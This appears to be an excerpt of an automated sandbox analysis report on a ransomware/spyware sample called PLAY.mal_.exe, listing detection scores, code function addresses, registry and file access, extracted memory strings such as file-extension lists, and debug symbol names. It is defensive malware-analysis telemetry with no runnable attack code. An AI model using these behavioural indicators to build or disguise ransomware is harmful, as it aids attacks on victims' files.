        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE1CAC0_2_00AE1CAC
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE54090_2_00AE5409
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE5D3E0_2_00AE5D3E
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEC7B00_2_00AEC7B0
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE2F760_2_00AE2F76
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE705A0_2_00AE705A
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00B0223D0_2_00B0223D
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEF5800_2_00AEF580
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEC7D90_2_00AEC7D9
        Source: C:\Users\user\Desktop\PLAY.mal_.exeProcess Stats: CPU usage > 98%
        Source: PLAY.mal_.exeReversingLabs: Detection: 80%
        Source: PLAY.mal_.exeVirustotal: Detection: 71%
        Source: PLAY.mal_.exeMetadefender: Detection: 45%
        Source: PLAY.mal_.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PLAY.mal_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
        Source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
        Source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile written: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.iniJump to behavior
        Source: classification engineClassification label: mal64.rans.spyw.winEXE@1/514@0/100
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEA224 GetDiskFreeSpaceExW,0_2_00AEA224
        Source: PLAY.mal_.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: PLAY.mal_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: netutils.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380967509.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernel32.pdb source: PLAY.mal_.exe, 00000000.00000003.380378382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcrypt.pdb source: PLAY.mal_.exe, 00000000.00000003.380946454.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ucrtbase.pdb source: PLAY.mal_.exe, 00000000.00000003.381007395.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcrt.pdb source: PLAY.mal_.exe, 00000000.00000003.392615104.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wrpcrt4.pdb source: PLAY.mal_.exe, 00000000.00000003.381337074.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PLAY.mal_.exe, 00000000.00000003.380084663.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shcore.pdb source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wwin32u.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.402134952.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcryptprimitives.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381571826.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32.pdb source: PLAY.mal_.exe, 00000000.00000003.398338084.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: advapi32.pdb source: PLAY.mal_.exe, 00000000.00000003.397854199.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: fltLib.pdb source: PLAY.mal_.exe, 00000000.00000003.402653498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wsspicli.pdb source: PLAY.mal_.exe, 00000000.00000003.381518459.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cfgmgr32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.392986515.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shell32.pdb source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wrpcrt4.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381337074.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcp_win.pdb source: PLAY.mal_.exe, 00000000.00000003.399573219.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398338084.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wimm32.pdb source: PLAY.mal_.exe, 00000000.00000003.402719687.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernelbase.pdb source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shlwapi.pdb source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: mpr.pdb source: PLAY.mal_.exe, 00000000.00000003.402907884.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shlwapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wwin32u.pdb source: PLAY.mal_.exe, 00000000.00000003.402134952.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wsspicli.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.381518459.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: combase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.393364039.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ucrtbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381007395.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: srvcli.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381294989.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernelbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cryptbase.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381549375.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wuser32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shell32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: srvcli.pdb source: PLAY.mal_.exe, 00000000.00000003.381294989.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wimm32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402719687.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: fltLib.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.402653498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: profapi.pdb source: PLAY.mal_.exe, 00000000.00000003.402283247.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32full.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.398793778.000000000317B000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ws2_32.pdb source: PLAY.mal_.exe, 00000000.00000003.382187348.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: iphlpapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381918022.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wgdi32full.pdb source: PLAY.mal_.exe, 00000000.00000003.398793778.000000000317B000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: shcore.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: mpr.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402907884.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: sechost.pdb source: PLAY.mal_.exe, 00000000.00000003.381665426.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: iphlpapi.pdb source: PLAY.mal_.exe, 00000000.00000003.381918022.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380084663.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: powrprof.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402395094.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: powrprof.pdb source: PLAY.mal_.exe, 00000000.00000003.402395094.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Windows.Storage.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: apphelp.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Kernel.Appcore.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402226498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wkernel32.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.380378382.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: sechost.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.381665426.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: PLAY.mal_.exe, 00000000.00000003.402226498.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcrypt.pdbGCTL source: PLAY.mal_.exe, 00000000.00000003.380946454.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: msvcp_win.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.399573219.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: advapi32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.397854199.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cryptbase.pdb source: PLAY.mal_.exe, 00000000.00000003.381549375.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: bcryptprimitives.pdb source: PLAY.mal_.exe, 00000000.00000003.381571826.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: cfgmgr32.pdb source: PLAY.mal_.exe, 00000000.00000003.392986515.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Windows.Storage.pdb source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: combase.pdb source: PLAY.mal_.exe, 00000000.00000003.393364039.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
        Source: Binary string: profapi.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.402283247.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: apphelp.pdb source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wuser32.pdb source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ws2_32.pdbUGP source: PLAY.mal_.exe, 00000000.00000003.382187348.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: netutils.pdb source: PLAY.mal_.exe, 00000000.00000003.380967509.0000000003100000.00000004.00001000.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE98A4 push edi; retf F1E9h0_2_00AE9BDF
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEE160 push cs; iretd 0_2_00AEE178
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEA472 push edi; retf F1E9h0_2_00AEA53E
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF18CF pushfd ; ret 0_2_00AF18E1
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE98CB push edi; retf F1E9h0_2_00AE9BDF
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEF839 push edi; ret 0_2_00AEF837
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE1033 push eax; ret 0_2_00AE1051
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE218F push ebp; ret 0_2_00AE21F7
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEA9C6 push edi; ret 0_2_00AEA9CB
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE1121 pushad ; ret 0_2_00AE1139
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AEF2AD push ss; ret 0_2_00AEF2AE
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE933B push ds; ret 0_2_00AE9343
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF037E pushad ; retf 0_2_00AF037F
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF84E6 push ecx; ret 0_2_00AF84F9
